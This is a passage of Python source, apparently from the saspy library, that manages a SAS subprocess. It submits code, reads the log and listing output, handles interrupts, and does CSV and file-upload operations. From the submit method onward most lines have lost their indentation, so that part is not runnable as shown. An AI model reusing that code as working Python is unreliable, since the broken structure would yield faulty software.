                signal.signal(signal.SIGINT, signal.SIG_DFL)
                # Rewire fds 0/1/2 onto the pipe ends, then close originals.
                os.close(0)
                os.close(1)
                os.close(2)
                os.dup2(pin[PIPE_READ], 0)
                os.dup2(pout[PIPE_WRITE], 1)
                os.dup2(perr[PIPE_WRITE], 2)
                os.close(pin[PIPE_READ])
                os.close(pin[PIPE_WRITE])
                os.close(pout[PIPE_READ])
                os.close(pout[PIPE_WRITE])
                os.close(perr[PIPE_READ])
                os.close(perr[PIPE_WRITE])
                try:
                    #sleep(5)
                    os.execv(pgm, parms)
                except OSError as e:
                    print("The OS Error was:\n"+e.strerror+'\n')
                    print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
                    print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
                    print("If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n")
                    os._exit(-6)
                except:
                    print("Subprocess failed to start. Double check your settings in sascfg_personal.py file.\n")
                    os._exit(-6)
        if os.name == 'nt':
            try:
                # If the process exits within a second, treat its output as
                # the startup error; TimeoutExpired means it is still alive.
                self.pid.wait(1)
                error = self.pid.stderr.read(4096).decode()+'\n'
                error += self.pid.stdout.read(4096).decode()
                print("Java Error:\n"+error)
                print("Subprocess failed to start. Double check your settings in sascfg_personal.py file.\n")
                print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
                print("If no Java Error above, try running the following command (where saspy is running) manually to see if it's a problem starting Java:\n"+s+"\n")
                self.pid = None
                return None
            except:
                # lame windows can't do non-blocking I/O
                self.stdout = Queue()
                self.stderr = Queue()
                self.to = Thread(target=self._read_out, args=())
                self.te = Thread(target=self._read_err, args=())
                self.to.daemon = True
                self.te.daemon = True
                self.to.start()
                self.te.start()
                self.stdin = self.pid.stdin
        else:
            self.pid = pidpty[0]
            self.stdin = os.fdopen(pin[PIPE_WRITE], mode='wb')
            self.stderr = os.fdopen(perr[PIPE_READ], mode='rb')
            self.stdout = os.fdopen(pout[PIPE_READ], mode='rb')
            # Non-blocking reads so the poll loops elsewhere never hang.
            fcntl.fcntl(self.stdout, fcntl.F_SETFL, os.O_NONBLOCK)
            fcntl.fcntl(self.stderr, fcntl.F_SETFL, os.O_NONBLOCK)
            rc = os.waitpid(self.pid, os.WNOHANG)
            if rc[0] != 0:
                # Child already died; show whatever it wrote.
                self.pid = None
                self._sb.SASpid = None
                lst = self.stdout.read1(4096)
                print("stdout from subprocess is:\n"+lst.decode())
        if self.pid is None:
            print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
            print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
            print("Try running the following command (where saspy is running) manually to see if you can get more information on what went wrong:\n"+s+"\n")
            return None
        else:
            enc = self.sascfg.encoding #validating encoding is done next, so handle it not being set for this one call
            if enc == '':
                self.sascfg.encoding = 'utf-8'
            # Smoke-test submit; also sets session options.
            ll = self.submit("options svgtitle='svgtitle'; options validvarname=any validmemname=extend; ods graphics on;", "text")
            self.sascfg.encoding = enc
            if self.pid is None:
                print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
                print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
                print("Try running the following command (where saspy is running) manually to see if you can get more information on what went wrong:\n"+s+"\n")
                return None
        if self.sascfg.verbose:
            pid = self.pid if os.name != 'nt' else self.pid.pid
            print("SAS Connection established. Subprocess id is "+str(pid)+"\n")
        return self.pid
    # Windows only: background reader threads that drain the subprocess
    # pipes into Queues, since non-blocking pipe I/O is unavailable there.
    if os.name == 'nt':
        def _read_out(self):
            # Forward stdout chunks to the queue until EOF (empty read).
            while True:
                lst = self.pid.stdout.read(4096)
                if lst == b'':
                    break
                self.stdout.put(lst)
        def _read_err(self):
            # Forward stderr (the SAS log) chunks to the queue until EOF.
            while True:
                log = self.pid.stderr.read(4096)
                if log == b'':
                    break
                self.stderr.put(log)
    def _endsas(self):
        """Terminate the SAS subprocess: request endsas, then kill if needed."""
        rc = 0
        ret = None
        if self.pid:
            # The magic prefix closes any dangling quotes/comments so the
            # endsas statement is honored regardless of pending input.
            code = b";*\';*\";*/;\n;quit;endsas;\n"
            self._getlog(wait=1)
            if self.pid:
                out = self.stdin.write(code)
                self.stdin.flush()
            #self._asubmit(code,'text')
            sleep(1)
            if self.pid:
                if os.name == 'nt':
                    pid = self.pid.pid
                    try:
                        rc = self.pid.wait(5)
                    except (subprocess.TimeoutExpired):
                        if self.sascfg.verbose:
                            print("SAS didn't shutdown w/in 5 seconds; killing it to be sure")
                        self.pid.kill()
                    # Let the reader threads drain and exit.
                    self.to.join(5)
                    self.te.join(5)
                else:
                    pid = self.pid
                    x = 5
                    # Poll up to ~5 seconds for the child to exit on its own.
                    while True:
                        rc = os.waitpid(self.pid, os.WNOHANG)
                        if rc[0] != 0:
                            break
                        x = x - 1
                        if x < 1:
                            break
                        sleep(1)
                    if rc[0] != 0:
                        pass
                    else:
                        if self.sascfg.verbose:
                            print("SAS didn't shutdown w/in 5 seconds; killing it to be sure")
                        os.kill(self.pid, signal.SIGKILL)
                if self.sascfg.verbose:
                    print("SAS Connection terminated. Subprocess id was "+str(pid))
                self.pid = None
                self._sb.SASpid = None
        return ret
    def _getlog(self, wait=5, jobid=None):
        """Read accumulated SAS log output from stderr.

        wait -- roughly how many seconds to keep polling for log content
        Returns the decoded log text, or an error string if SAS has died.
        """
        logf = b''
        quit = wait * 2        # poll counter: two half-second polls per second
        logn = self._logcnt(False)
        # Marker pair emitted by submit(); stripped from the returned text.
        code1 = "%put E3969440A681A24088859985"+logn+";\nE3969440A681A24088859985"+logn
        # Bail out early if the subprocess has already terminated.
        if os.name == 'nt':
            try:
                rc = self.pid.wait(0)
                self.pid = None
                return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
            except:
                pass
        else:
            rc = os.waitpid(self.pid, os.WNOHANG)
            if rc[0] != 0:
                self.pid = None
                self._sb.SASpid = None
                return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
        while True:
            if os.name == 'nt':
                try:
                    log = self.stderr.get_nowait()
                except Empty:
                    log = b''
            else:
                log = self.stderr.read1(4096)
            if len(log) > 0:
                logf += log
            else:
                quit -= 1
                # Stop once we have anything, or the wait budget is spent.
                if quit < 0 or len(logf) > 0:
                    break
                sleep(0.5)
        x = logf.decode(self.sascfg.encoding, errors='replace').replace(code1, " ")
        self._log += x
        if x.count('ERROR:') > 0:
            warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
            self._sb.check_error_log = True
        if self.pid == None:
            self._sb.SASpid = None
            return "No SAS process attached. SAS process has terminated unexpectedly."
        # Final liveness check after draining the log.
        if os.name == 'nt':
            try:
                rc = self.pid.wait(0)
                self.pid = None
                return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
            except:
                pass
        else:
            rc = os.waitpid(self.pid, os.WNOHANG)
            if rc[0] != 0:
                self.pid = None
                self._sb.SASpid = None
                return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
        return x
    def _getlst(self, wait=5, jobid=None):
        """Read HTML listing output from stdout until </html> (or timeout).

        wait -- polling budget in seconds used only before the document
                start (<!DOCTYPE html>) has been seen
        Returns the decoded listing, or an error string if SAS has died.
        """
        lstf = b''
        quit = wait * 2
        eof = 0
        bof = False        # have we seen the beginning of an HTML document?
        lenf = 0
        while True:
            if os.name == 'nt':
                try:
                    lst = self.stdout.get_nowait()
                except Empty:
                    lst = b''
            else:
                lst = self.stdout.read1(4096)
            if len(lst) > 0:
                lstf += lst
                if ((not bof) and lst.count(b"<!DOCTYPE html>", 0, 20) > 0):
                    bof = True
            else:
                lenf = len(lstf)
                if (lenf > 15):
                    # Look for the closing tag within the final bytes only.
                    eof = lstf.count(b"</html>", (lenf - 15), lenf)
                    if (eof > 0):
                        break
                if not bof:
                    quit -= 1
                    if quit < 0:
                        break
                    sleep(0.5)
        if self.pid == None:
            self._sb.SASpid = None
            return "No SAS process attached. SAS process has terminated unexpectedly."
        if os.name == 'nt':
            try:
                rc = self.pid.wait(0)
                self.pid = None
                return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
            except:
                pass
        else:
            rc = os.waitpid(self.pid, os.WNOHANG)
            if rc[0] != 0:
                self.pid = None
                self._sb.SASpid = None
                return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
        if eof:
            # Complete HTML document: default decode is sufficient.
            return lstf.decode(errors='replace')
        else:
            return lstf.decode(self.sascfg.encoding, errors='replace')
    def _getlsttxt(self, wait=5, jobid=None):
        """Read text-mode listing output, using a sentinel line to find the end.

        Submits a tiny data step that prints a known sentinel, then reads
        stdout until that sentinel appears; everything before it (minus the
        final page break) is the listing.
        """
        f2 = [None]
        lstf = b''
        quit = wait * 2
        eof = 0
        # Emit the sentinel so we can detect when output is complete.
        self._asubmit("data _null_;file print;put 'Tom was here';run;", "text")
        while True:
            if os.name == 'nt':
                try:
                    lst = self.stdout.get_nowait()
                except Empty:
                    lst = b''
            else:
                lst = self.stdout.read1(4096)
            if len(lst) > 0:
                lstf += lst
                lenf = len(lstf)
                # Only the tail can contain the sentinel we just submitted.
                eof = lstf.find(b"Tom was here", lenf - 25, lenf)
                if (eof != -1):
                    # Strip the sentinel and the trailing form-feed page.
                    final = lstf.partition(b"Tom was here")
                    f2 = final[0].decode(self.sascfg.encoding, errors='replace').rpartition(chr(12))
                    break
        lst = f2[0]
        if self.pid == None:
            self._sb.SASpid = None
            return "No SAS process attached. SAS process has terminated unexpectedly."
        if os.name == 'nt':
            try:
                rc = self.pid.wait(0)
                self.pid = None
                return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
            except:
                pass
        else:
            rc = os.waitpid(self.pid, os.WNOHANG)
            if rc[0] != 0:
                self.pid = None
                self._sb.SASpid = None
                return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
        # Convert form feeds (page breaks) into newlines.
        return lst.replace(chr(12), '\n')
    def _asubmit(self, code, results="html"):
        """Write code to SAS without reading back the results (async submit)."""
        # as this is an _ method, it's not really to be used. Of note is that if this is used and if what it submitted generates
        # anything to the lst, then unless _getlst[txt] is called, then next submit will happen to get the lst this wrote, plus
        # what it generates. If the two are not of the same type (html, text) it could be problematic, beyond not being what was
        # expected in the first place. __flushlst__() used to be used, but was never needed. Adding this note and removing the
        # unnecessary read in submit as this can't happen in the current code.
        odsopen = b"ods listing close;ods "+self.sascfg.output.encode()+ \
                  b" (id=saspy_internal) file=stdout options(bitmap_mode='inline') device=svg style="+self._sb.HTML_Style.encode()+ \
                  b"; ods graphics on / outputfmt=png;\n"
        odsclose = b"ods "+self.sascfg.output.encode()+b" (id=saspy_internal) close;ods listing;\n"
        ods = True;
        if results.upper() != "HTML":
            ods = False
        # Wrap the code in ODS open/close only for HTML results.
        if (ods):
            self.stdin.write(odsopen)
        out = self.stdin.write(code.encode(self.sascfg.encoding)+b'\n')
        if (ods):
            self.stdin.write(odsclose)
        self.stdin.flush()
        return str(out)
def submit(self, code: str, results: str ="html", prompt: dict = None, **kwargs) -> dict:
'''
This method is used to submit any SAS code. It returns the Log and Listing as a python dictionary.
code - the SAS statements you want to execute
results - format of results, HTML is default, TEXT is the alternative
prompt - dict of names:flags to prompt for; create macro variables (used in submitted code), then keep or delete
The keys are the names of the macro variables and the boolean flag is to either hide what you type and delete
the macros, or show what you type and keep the macros (they will still be available later)
for example (what you type for pw will not be displayed, user and dsname will):
results = sas.submit(
"""
libname tera teradata server=teracop1 user=&user pw=&pw;
proc print data=tera.&dsname (obs=10); run;
""" ,
prompt = {'user': False, 'pw': True, 'dsname': False}
)
Returns - a Dict containing two keys:values, [LOG, LST]. LOG is text and LST is 'results' (HTML or TEXT)
NOTE: to view HTML results in the ipykernel, issue: from IPython.display import HTML and use HTML() instead of print()
i.e,: results = sas.submit("data a; x=1; run; proc print;run')
print(results['LOG'])
HTML(results['LST'])
'''
prompt = prompt if prompt is not None else {}
printto = kwargs.pop('undo', False)
odsopen = b"ods listing close;ods "+self.sascfg.output.encode()+ \
b" (id=saspy_internal) file=stdout options(bitmap_mode='inline') device=svg style="+self._sb.HTML_Style.encode()+ \
b"; ods graphics on / outputfmt=png;\n"
odsclose = b"ods "+self.sascfg.output.encode()+b" (id=saspy_internal) close;ods listing;\n"
ods = True;
mj = b";*\';*\";*/;"
lstf = b''
logf = b''
bail = False
eof = 5
bc = False
done = False
logn = self._logcnt()
#logcodei = "%put E3969440A681A24088859985" + logn + ";"
#logcodeo = b"\nE3969440A681A24088859985" + logn.encode()
logcodei = "%put %upcase(e3969440a681a24088859985" + logn + ");"
logcodeo = b"E3969440A681A24088859985" + logn.encode()
pcodei = ''
pcodeiv = ''
pcodeo = ''
undo = b'proc printto;run;\n' if printto else b''
if self.pid == None:
self._sb.SASpid = None
print("No SAS process attached. SAS process has terminated unexpectedly.")
return dict(LOG="No SAS process attached. SAS process has terminated unexpectedly.", LST='')
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. Pid State= '+str(rc), LST='')
# to cover the possibility of an _asubmit w/ lst output not read; no known cases now; used to be __flushlst__()
# removing this and adding comment in _asubmit to use _getlst[txt] so this will never be necessary; delete later
#while(len(self.stdout.read1(4096)) > 0):
# continue
if results.upper() != "HTML":
ods = False
if len(prompt):
pcodei += 'options nosource nonotes;\n'
pcodeo += 'options nosource nonotes;\n'
for key in prompt:
gotit = False
while not gotit:
var = self.sascfg._prompt('Please enter value for macro variable '+key+' ', pw=prompt[key])
if var is None:
raise RuntimeError("No value for prompted macro variable provided.")
if len(var) > 0:
gotit = True
else:
print("Sorry, didn't get a value for that variable.")
if prompt[key]:
pcodei += '%let '+key+'='+var+';\n'
pcodeo += '%symdel '+key+';\n'
else:
pcodeiv += '%let '+key+'='+var+';\n'
pcodei += 'options source notes;\n'
pcodeo += 'options source notes;\n'
if ods:
self.stdin.write(odsopen)
pgm = mj+b'\n'+pcodei.encode(self.sascfg.encoding)+pcodeiv.encode(self.sascfg.encoding)
pgm += code.encode(self.sascfg.encoding)+b'\n'+pcodeo.encode(self.sascfg.encoding)+b'\n'+mj
out = self.stdin.write(pgm)
if ods:
self.stdin.write(odsclose)
out = self.stdin.write(undo+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
bof = False
while not done:
try:
while True:
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
log = b''
try:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
self._log += logf.decode(self.sascfg.encoding, errors='replace')
except:
pass
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. Pid State= ' +
str(rc)+'\n'+logf.decode(self.sascfg.encoding, errors='replace'), LST='')
if bail:
eof -= 1
if eof < 0:
break
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
if ods and not bof and lstf.count(b"<!DOCTYPE html>", 0, 20) > 0:
bof = True
else:
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
if not bail and bc:
self.stdin.write(undo+odsclose+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
bc = False
if not bail and logf.count(logcodeo) >= 1:
if ods:
lenf = len(lstf)
if lenf > 20 and bof:
if lstf.count(b"</html>", (lenf - 15), lenf):
bail = True
else:
bail = True
done = True
except (ConnectionResetError):
log = ''
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
try:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
self._log += logf.decode(self.sascfg.encoding, errors='replace')
except:
pass
rc = 0
if os.name == 'nt':
try:
rc = self.pid.wait(0)
except:
pass
else:
rc = os.waitpid(self.pid, 0)
self.pid = None
self._sb.SASpid = None
log = logf.partition(logcodeo)[0]+b'\nConnection Reset: SAS process has terminated unexpectedly. Pid State= '+str(rc).encode()+b'\n'+logf
return dict(LOG=log.encode(), LST='')
except (KeyboardInterrupt, SystemExit):
if not self._sb.sascfg.prompt:
raise KeyboardInterrupt("Interupt handling is disabled due to prompting being disabled.")
print('Exception caught!')
ll = self._breakprompt(logcodeo)
if ll.get('ABORT', False):
return ll
logf += ll['LOG']
lstf += ll['LST']
bc = ll['BC']
if not bc:
print('Exception handled :)\n')
else:
print('Exception ignored, continuing to process...\n')
self.stdin.write(undo+odsclose+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
if ods:
try:
lstf = lstf.decode()
except UnicodeDecodeError:
try:
lstf = lstf.decode(self.sascfg.encoding)
except UnicodeDecodeError:
lstf = lstf.decode(errors='replace')
else:
lstf = lstf.decode(self.sascfg.encoding, errors='replace')
logf = logf.decode(self.sascfg.encoding, errors='replace').replace(chr(12), chr(10))
trip = lstf.rpartition("/*]]>*/")
if len(trip[1]) > 0 and len(trip[2]) < 200:
lstf = ''
self._log += logf
final = logf.partition(logcodei)
z = final[0].rpartition(chr(10))
prev = '%08d' % (self._log_cnt - 1)
zz = z[0].rpartition("E3969440A681A24088859985" + prev)
logd = zz[2].replace(mj.decode(self.sascfg.encoding), '').replace(chr(12), chr(10))
lstd = lstf.replace(chr(12), chr(10)).replace('<body class="c body">',
'<body class="l body">').replace("font-size: x-small;",
"font-size: normal;")
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
self._sb._lastlog = logd
return dict(LOG=logd, LST=lstd)
def _breakprompt(self, eos):
found = False
logf = b''
lstf = b''
bc = False
if self.pid is None:
self._sb.SASpid = None
return dict(LOG="No SAS process attached. SAS process has terminated unexpectedly.", LST='', ABORT=True)
if self.sascfg.ssh:
response = self.sascfg._prompt(
"SAS attention handling not supported over ssh. Please enter (T) to terminate SAS or (C) to continue.")
while True:
if response is None or response.upper() == 'C':
return dict(LOG=b'', LST=b'', BC=True)
if response.upper() == 'T':
break
response = self.sascfg._prompt("Please enter (T) to terminate SAS or (C) to continue.")
if os.name == 'nt':
self.pid.kill()
else:
interrupt = signal.SIGINT
os.kill(self.pid, interrupt)
sleep(.25)
while True:
if os.name == 'nt':
try:
rc = self.pid.wait(0)
except:
pass
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. RC from wait was: '+str(rc), LST='',ABORT=True)
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
outrc = str(rc)
return dict(LOG='SAS process has terminated unexpectedly. Pid State= '+outrc, LST='',ABORT=True)
lst = self.stdout.read1(4096)
lstf += lst
if len(lst) > 0:
lsts = lst.rpartition(b'Select:')
if lsts[0] != b'' and lsts[1] != b'':
found = True
query = lsts[1] + lsts[2].rsplit(b'\n?')[0] + b'\n'
print('Processing interrupt\nAttn handler Query is\n\n' + query.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if (response == 'C' or response == 'c') and query.count("C. Cancel") >= 1:
bc = True
break
else:
lsts = lst.rpartition(b'Press')
if lsts[0] != b'' and lsts[1] != b'':
query = lsts[1] + lsts[2].rsplit(b'\n?')[0] + b'\n'
print('Secondary Query is:\n\n' + query.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if (response == 'N' or response == 'n') and query.count("N to continue") >= 1:
bc = True
break
else:
print("******************No 'Select' or 'Press' found. Here's what was found.")
found = True
print('Processing interrupt\nAttn handler Query is\n\n' + lst.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: or N/A only if there are no choices: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if response in ['N/A', '']:
break
found = True
bc = True
else:
log = self.stderr.read1(4096)
logf += log
self._log += log.decode(self.sascfg.encoding, errors='replace')
if log.count(eos) >= 1:
print("******************Found end of step. No interrupt processed")
found = True
if found:
break
sleep(.25)
lstr = lstf
logr = logf
return dict(LOG=logr, LST=lstr, BC=bc)
   def _break(self, inlst=''):
      """
      Interrupt the attached SAS process (SIGINT) and interactively walk through
      the resulting attention-handler prompts ('Select:' / 'Press ...' menus)
      read from stdout, preferring cancel/halt responses when offered.

      inlst - stdout text already read by the caller, scanned first

      Returns the last chunk of LOG text read from stderr.
      NOTE(review): this str-based handler looks superseded by _breakprompt(),
      which operates on bytes — confirm before changing either.
      """
      found = False
      lst = inlst
      interupt = signal.SIGINT
      os.kill(self.pid, interupt)
      sleep(.25)
      self._asubmit('','text')
      while True:
         if len(lst) > 0:
            # An attention menu surfaced on stdout: look for the 'Select:' marker.
            lsts = lst.rpartition('Select:')
            if lsts[0] != '' and lsts[1] != '':
               found = True
               print('Processing interupt\nAttn handler Query is\n\n'+lsts[1]+lsts[2].rsplit('\n?')[0]+'\n')
               # Pick a response: prefer cancelling submitted statements, then
               # halting the DATA step, then cancelling the dialog. The response
               # is the menu number that precedes the matched option text.
               opt = lsts[2].partition('Cancel Submitted Statements')
               if opt[0] != '' and opt[1] != '':
                  response = opt[0].rpartition('.')[0].rpartition(' ')[2]
               else:
                  opt = lsts[2].partition('Halt DATA')
                  if opt[0] != '' and opt[1] != '':
                     response = opt[0].rpartition('.')[0].rpartition(' ')[2]
                  else:
                     opt = lsts[2].partition('Cancel the dialog')
                     if opt[0] != '' and opt[1] != '':
                        response = opt[0].rpartition('.')[0].rpartition(' ')[2]
                     else:
                        print("Unknown 'Select' choices found: ")
                        response = ''
               print("'Select' Response="+response+'\n')
               self._asubmit(response+'\n','text')
            else:
               # Secondary 'Press ...' style prompt.
               lsts = lst.rpartition('Press')
               if lsts[0] != '' and lsts[1] != '':
                  print('Seconday Query is:\n\n'+lsts[1]+lsts[2].rsplit('\n?')[0]+'\n')
                  opt = lsts[2].partition(' to exit ')
                  if opt[0] != '' and opt[1] != '':
                     response = opt[0].rpartition(' ')[2]
                  else:
                     opt = lsts[2].partition('N to continue')
                     if opt[0] != '' and opt[1] != '':
                        response = 'Y'
                     else:
                        response = 'X'
                  print("'Press' Response="+response+'\n')
                  self._asubmit(response+'\n','text')
               else:
                  #print("******************No 'Select' or 'Press' found in lst=")
                  pass
            sleep(.25)
            lst = self.stdout.read1(4096).decode(self.sascfg.encoding, errors='replace')
         else:
            # Nothing on stdout: drain the LOG and watch for the end-of-step marker.
            log = self.stderr.read1(4096).decode(self.sascfg.encoding, errors='replace')
            self._log += log
            logn = self._logcnt(False)
            if log.count("E3969440A681A24088859985"+logn+"\n") >= 1:
               print("******************Found end of step. No interupt processed")
               found = True
            if found:
               # Restore the ODS/listing state before returning to the caller.
               ll = self.submit("ods "+self.sascfg.output+" (id=saspy_internal) close;ods listing close;ods listing;libname work list;\n",'text')
               break
            sleep(.25)
            lst = self.stdout.read1(4096).decode(self.sascfg.encoding, errors='replace')
      return log
def saslog(self):
"""
this method is used to get the current, full contents of the SASLOG
"""
return self._log
def exist(self, table: str, libref: str ="") -> bool:
"""
table - the name of the SAS Data Set
libref - the libref for the Data Set, defaults to WORK, or USER if assigned
Returns True it the Data Set exists and False if it does not
"""
code = 'data _null_; e = exist("'
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n"+'"'+");\n"
code += 'v = exist("'
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n"+'"'+", 'VIEW');\n if e or v then e = 1;\n"
code += "put 'TABLE_EXISTS=' e 'TAB_EXTEND=';run;"
ll = self.submit(code, "text")
exists = int(ll['LOG'].rpartition("TABLE_EXISTS=")[2].rpartition(" TAB_EXTEND=")[0])
return bool(exists)
def read_csv(self, file: str, table: str, libref: str ="", nosub: bool =False, opts: dict = None) -> '<SASdata object>':
"""
This method will import a csv file into a SAS Data Set and return the SASdata object referring to it.
file - eithe the OS filesystem path of the file, or HTTP://... for a url accessible file
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
opts - a dictionary containing any of the following Proc Import options(datarow, delimiter, getnames, guessingrows)
"""
opts = opts if opts is not None else {}
code = "filename x "
if file.lower().startswith("http"):
code += "url "
code += "\""+file+"\";\n"
code += "proc import datafile=x out="
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n dbms=csv replace; "+self._sb._impopts(opts)+" run;"
if nosub:
print(code)
else:
ll = self.submit(code, "text")
def write_csv(self, file: str, table: str, libref: str ="", nosub: bool =False, dsopts: dict = None, opts: dict = None) -> 'The LOG showing the results of the step':
"""
This method will export a SAS Data Set to a file in CSV format.
file - the OS filesystem path of the file to be created (exported from the SAS Data Set)
table - the name of the SAS Data Set you want to export to a CSV file
libref - the libref for the SAS Data Set.
dsopts - a dictionary containing any of the following SAS data set options(where, drop, keep, obs, firstobs)
opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)
"""
dsopts = dsopts if dsopts is not None else {}
opts = opts if opts is not None else {}
code = "filename x \""+file+"\";\n"
code += "options nosource;\n"
code += "proc export data="
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n "+self._sb._dsopts(dsopts)+" outfile=x dbms=csv replace;\n"
code += self._sb._expopts(opts)+" run;\n"
code += "options source;\n"
if nosub:
print(code)
else:
ll = self.submit(code, "text")
return ll['LOG']
def upload_slow(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
data _null_;
file saspydir;
infile datalines;
input;
lin = length(_infile_);
outdata = inputc(_infile_, '$hex.', lin);
lout = lin/2;
put outdata $varying80. lout;
datalines4;"""
buf = fd.read1(40)
if len(buf):
self._asubmit(code, "text")
else:
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
data _null_;
fid = fopen('saspydir', 'O');
if fid then
rc = fclose(fid);
run;\n"""
ll = self.submit(code, 'text')
fd.close()
return {'Success' : True,
'LOG' : ll['LOG']}
while len(buf):
buf2 = ''
for i in range(len(buf)):
buf2 += '%02x' % buf[i]
self.stdin.write(buf2.encode()+b'\n')
buf = fd.read1(40)
self._asubmit(";;;;", "text")
ll = self.submit("run;\nfilename saspydir;", 'text')
fd.close()
return {'Success' : True,
'LOG' : ll['LOG']}
def upload(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
port = kwargs.get('port', 0)
if self.sascfg.ssh and self.sascfg.rtunnel and port == 0:
# we are using a rtunnel; default to that port
port = self.sascfg.rtunnel
host = 'localhost'
else:
return self._upload_client(localfile, remotefile, overwrite, permission, **kwargs)
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
filename sock socket ':"""+str(port)+"""' server reconn=0 recfm=S lrecl=4096;
data _null_; nb = -1;
infile sock nbyte=nb;
file saspydir;
input;
put _infile_;
run;
filename saspydir;
filename sock;\n"""
self._asubmit(code, "text")
sock = socks.socket()
sock.connect((host, port))
done = False
while not done:
try:
while True:
buf = fd.read1(4096)
sent = 0
send = len(buf)
blen = send
if blen:
while send:
try:
sent = 0
sent = sock.send(buf[blen-send:blen])
except (BlockingIOError):
pass
except (OSError):
sock.close()
fd.close()
sock = socks.socket()
sock.connect((host, port))
fd = open(localfile, 'rb')
sleep(.5)
break
send -= sent
else:
done = True
sock.shutdown(socks.SHUT_RDWR)
sock.close()
fd.close()
break
except (KeyboardInterrupt, Exception) as e:
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ll = self.submit("", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
